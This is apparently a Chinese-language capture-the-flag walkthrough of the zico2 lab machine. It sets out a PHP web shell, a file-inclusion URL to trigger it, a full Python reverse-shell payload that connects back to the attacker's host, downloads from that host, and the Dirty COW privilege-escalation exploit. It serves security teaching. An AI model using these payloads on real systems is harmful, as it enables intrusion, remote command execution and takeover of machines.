zico2靶机精讲

admin 2025年3月2日21:46:05评论4 views字数 1537阅读5分7秒阅读模式

一、主机发现

arp-scan -l
zico2靶机精讲

靶机ip为192.168.55.147

二、端口扫描、目录枚举、指纹识别

2.1端口扫描

zico2靶机精讲

发现有111这一个特殊端口,启用了rpcbind服务

2.2目录枚举

dirb http://192.168.55.147
zico2靶机精讲

2.3指纹识别

nmap 192.168.55.147 -sV -sC -O --version-all
zico2靶机精讲

三、进入靶机网站收集信息,反弹shell

进入靶机页面后发现没有交互界面,重新回到目录枚举时枚举到的目录中,依次查看枚举出来的目录

zico2靶机精讲

发现此目录下有一个php文件,别的很多目录都是js文件

zico2靶机精讲

访问后发现是一个登录框,首先去查找一下中间件的漏洞

zico2靶机精讲

发现版本号相同,可能能够利用

通过查看24044.txt文件可知,攻击者可以创建一个数据库,可以在其中写入一句话木马

尝试使用弱口令,发现admin即可成功登陆

zico2靶机精讲

登陆后需要根据刚刚的文件内容进行创建数据库并写入一句话木马

首先创建一个shell.php的数据库

zico2靶机精讲

切换到shell.php数据库中创建数据

zico2靶机精讲

然后创建表

zico2靶机精讲
zico2靶机精讲

写入一句话木马

<?php echo system($_GET["cmd"]); ?>
zico2靶机精讲

创建成功后给了绝对路径

zico2靶机精讲

现在就要考虑怎么进行访问了

回到首页

zico2靶机精讲

发现该网站可能存在文件包含漏洞

zico2靶机精讲

尝试访问创建的shell.php文件

http://192.168.55.147/view.php?page=../../../../../usr/databases/shell.php
zico2靶机精讲
http://192.168.55.147/view.php?page=../../../../../usr/databases/shell.php&cmd=whoami
zico2靶机精讲

成功!

接下来进行反弹shell

kali桌面进行444端口的监听

使用反弹shell的命令

http://192.168.55.147/view.php?page=../../../../../usr/databases/shell.php&cmd=python%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.55.129%22,4444));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import%20pty;%20pty.spawn(%22/bin/bash%22)%27
zico2靶机精讲

成功拿下shell

四、脏牛提权

首先进行靶机信息收集

uname-a
lsb_release -a
zico2靶机精讲

使用提权脚本查找一下内核漏洞

ls -la//首先查看目录权限,发现tmp目录具有权限
cd /tmp   //切换到tmp目录下
python -m http.server 80  //攻击机开启80端口
wget http://192.168.55.129/linpeas.sh    //靶机使用wget命令进行下载攻击机中的linpeas.sh脚本
chmod 777 linpeas.sh     //然后使用chmod命令赋予该脚本执行权限
./linpeas.sh   //使用该脚本
zico2靶机精讲

发现可以使用脏牛提权

zico2靶机精讲

在github中下载脚本到kali中

然后将脚本上传到靶机中

wget http://192.168.55.129/40839.c

在靶机中进行编译

gcc -pthread dirty.c -o dirty -lcrypt

执行exp

./dirty

提示输入密码,自己设置即可

zico2靶机精讲

然后使用ssh进行登录firefart用户即可

zico2靶机精讲

成功提权!

原文始发于微信公众号(泷羽Sec-pp502的安全笔记):zico2靶机精讲

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年3月2日21:46:05
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   zico2靶机精讲https://cn-sec.com/archives/3785287.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息